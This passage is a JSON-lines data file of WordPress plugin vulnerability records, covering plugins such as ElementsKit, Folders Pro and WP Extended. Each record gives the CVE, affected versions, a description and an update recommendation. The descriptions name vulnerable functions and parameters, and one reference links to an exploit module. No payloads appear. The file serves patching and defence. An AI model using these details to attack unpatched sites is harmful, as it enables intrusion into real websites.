version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"name\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36e699a4-91f2-426d-ba14-26036fbfeaea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36e699a4-91f2-426d-ba14-26036fbfeaea\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-ait-themes-csv-import-export-arbitrary-file-upload-3-0-3\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-ait-themes-csv-import-export-arbitrary-file-upload-3-0-3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.ait-themes.club\\\/wordpress-plugins\\\/csv-import-export\\\/\",\"name\":\"https:\\\/\\\/www.ait-themes.club\\\/wordpress-plugins\\\/csv-import-export\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cece751c-400d-42b4-9438-950d5aca51fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cece751c-400d-42b4-9438-950d5aca51fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6582","slug":"elementskit-lite","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.3 via the ekit_widgetarea_content function. This makes it possible for unauthenticated attackers to obtain contents of posts in draft, private or pending review status that should not be visible to the general public. This applies to posts created with Elementor only.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff4ae5c8-d164-4c2f-9bf3-83934c22cf4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff4ae5c8-d164-4c2f-9bf3-83934c22cf4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/init\\\/enqueue-scripts.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/init\\\/enqueue-scripts.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/modules\\\/controls\\\/widget-area-utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/modules\\\/controls\\\/widget-area-utils.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8542","slug":"everest-forms","versionImpact":"3.0.3","versionEndExcluding":"3.0.3.1","description":"The Everest Forms  WordPress plugin before 3.0.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5f94dcf-a6dc-4c4c-acb6-1a7ead701053\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5f94dcf-a6dc-4c4c-acb6-1a7ead701053\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3868","slug":"folders","versionImpact":"3.0.2","versionEndExcluding":"3.0.3","description":"The Folders Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's First Name and Last Name in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daa48b64-6f89-40be-a31f-31d1481dfc91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daa48b64-6f89-40be-a31f-31d1481dfc91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premio.io\\\/downloads\\\/folders\\\/\",\"name\":\"https:\\\/\\\/premio.io\\\/downloads\\\/folders\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4717","slug":"strong-testimonials","versionEndExcluding":"3.0.3","description":"The Strong Testimonials WordPress plugin before 3.0.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b679f5-44a8-46d4-89dd-94eb647cb672\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b679f5-44a8-46d4-89dd-94eb647cb672\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2024","slug":"folders-pro","versionImpact":"3.0.2","versionEndExcluding":"3.0.3","description":"The Folders Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_folders_file_upload' function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa1d953f-6a5c-46af-a1a5-2c4f90da679a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa1d953f-6a5c-46af-a1a5-2c4f90da679a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0\\\/includes\\\/media.replace.php#L1311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0\\\/includes\\\/media.replace.php#L1311\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3215","slug":"paid-memberships-pro","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.1. This is due to missing or incorrect nonce validation on the pmpro_update_level_group_order() function. This makes it possible for unauthenticated attackers to update order levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9ef7742-e6f8-4350-90e9-242d9d1b12a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9ef7742-e6f8-4350-90e9-242d9d1b12a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069136\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069136\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50891","slug":"zoho-forms","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zoho Forms Form plugin for WordPress \u2013 Zoho Forms allows Stored XSS.This issue affects Form plugin for WordPress \u2013 Zoho Forms: from n\/a through 3.0.1.\n\n","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-forms\\\/wordpress-zoho-forms-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-forms\\\/wordpress-zoho-forms-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11460","slug":"verowa-connect","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Verowa Connect plugin for WordPress is vulnerable to SQL Injection via the 'search_string' parameter in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verowa-connect\\\/trunk\\\/general\\\/rest-routes.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verowa-connect\\\/trunk\\\/general\\\/rest-routes.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201030%40verowa-connect&new=3201030%40verowa-connect&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201030%40verowa-connect&new=3201030%40verowa-connect&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5855","slug":"media-hygiene","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Media Hygiene: Remove or Delete Unused Images and More! plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the bulk_action_delete and delete_single_image_call AJAX actions in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments. A nonce check was added in version 3.0.1, however, it wasn't until version 3.0.2 that a capability check was added.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b02690-462a-458b-88c9-89acc9c209cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b02690-462a-458b-88c9-89acc9c209cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3112249%40media-hygiene&new=3112249%40media-hygiene&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3112249%40media-hygiene&new=3112249%40media-hygiene&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4278","slug":"masterstudy-lms-learning-management-system","versionEndExcluding":"3.0.18","description":"The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and\/or posts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb3173ec-9891-4bd8-9d05-24fe805b5235\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb3173ec-9891-4bd8-9d05-24fe805b5235\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2395","slug":"bulgarisation-for-woocommerce","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to generate and delete labels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0683","slug":"bulgarisation-for-woocommerce","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be759c83-a9df-4858-a724-28006a595404?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be759c83-a9df-4858-a724-28006a595404?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30796","slug":"wpextended","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS. This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 3.0.14.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpextended\\\/vulnerability\\\/wordpress-the-ultimate-wordpress-toolkit-wp-extended-plugin-3-0-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpextended\\\/vulnerability\\\/wordpress-the-ultimate-wordpress-toolkit-wp-extended-plugin-3-0-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13554","slug":"wpextended","versionImpact":"3.0.13","versionEndExcluding":"3.0.14","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reorder_route() function in all versions up to, and including, 3.0.13. This makes it possible for unauthenticated attackers to reorder posts.","recommendation":"Update to version 3.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233951%40wpextended&new=3233951%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233951%40wpextended&new=3233951%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136ecfa1-5591-4636-bc30-6c68ddc7f277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136ecfa1-5591-4636-bc30-6c68ddc7f277?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11916","slug":"wpextended","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on several functions in all versions up to, and including, 3.0.11. This makes it possible for authenticated attackers, with subscriber-level access and above, to import and activate arbitrary code snippets along with","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747d7649-bdf5-46d0-a496-59cb7eac77ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747d7649-bdf5-46d0-a496-59cb7eac77ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11816","slug":"wpextended","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Remote Code Execution in version 3.0.11. This is due to a missing capability check on the 'wpext_handle_snippet_update' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute code on the server providing an admin has created at least one code snippet.","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3ce53e5-8666-4227-83d3-58f35db0ce68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3ce53e5-8666-4227-83d3-58f35db0ce68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13406","slug":"xml-for-google-merchant-center","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The XML for Google Merchant Center plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'feed_id' parameter in all versions up to, and including, 3.0.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226403%40xml-for-google-merchant-center&new=3226403%40xml-for-google-merchant-center&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226403%40xml-for-google-merchant-center&new=3226403%40xml-for-google-merchant-center&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f66ae-65aa-4670-8b69-103070a000a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f66ae-65aa-4670-8b69-103070a000a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9347","slug":"wpextended","versionImpact":"3.0.9","versionEndExcluding":"3.0.10","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpext-export' parameter in all versions up to, and including, 3.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/tags\\\/3.0.9\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/tags\\\/3.0.9\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169963\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169963\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0874","slug":"klaviyo","versionEndExcluding":"3.0.10","description":"The Klaviyo WordPress plugin before 3.0.10 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/495e39db-793d-454b-9ef1-dd91cae2c49b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/495e39db-793d-454b-9ef1-dd91cae2c49b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1763","slug":"wp-social","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wp_social\/v1\/ REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to enable and disable certain providers for the social share and login features.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10874","slug":"quotes-llama","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quotes-llama\\\/tags\\\/3.0.0\\\/includes\\\/classes\\\/class-quotesllama-search.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quotes-llama\\\/tags\\\/3.0.0\\\/includes\\\/classes\\\/class-quotesllama-search.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9835","slug":"rss-feed-widget","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The RSS Feed Widget WordPress plugin before 3.0.1 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0277b060-805d-4b85-b5a4-fa93a731cd8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0277b060-805d-4b85-b5a4-fa93a731cd8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0169","slug":"zoho-forms","versionEndExcluding":"3.0.1","description":"The Zoho Forms WordPress plugin before 3.0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/178d71f2-4666-4f7e-ada5-cb72a50fd663\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/178d71f2-4666-4f7e-ada5-cb72a50fd663\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8187","slug":"post-carousel","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Smart Post Show WordPress plugin before 3.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e51b3b5-f003-4af9-8538-95f266065e36\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e51b3b5-f003-4af9-8538-95f266065e36\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
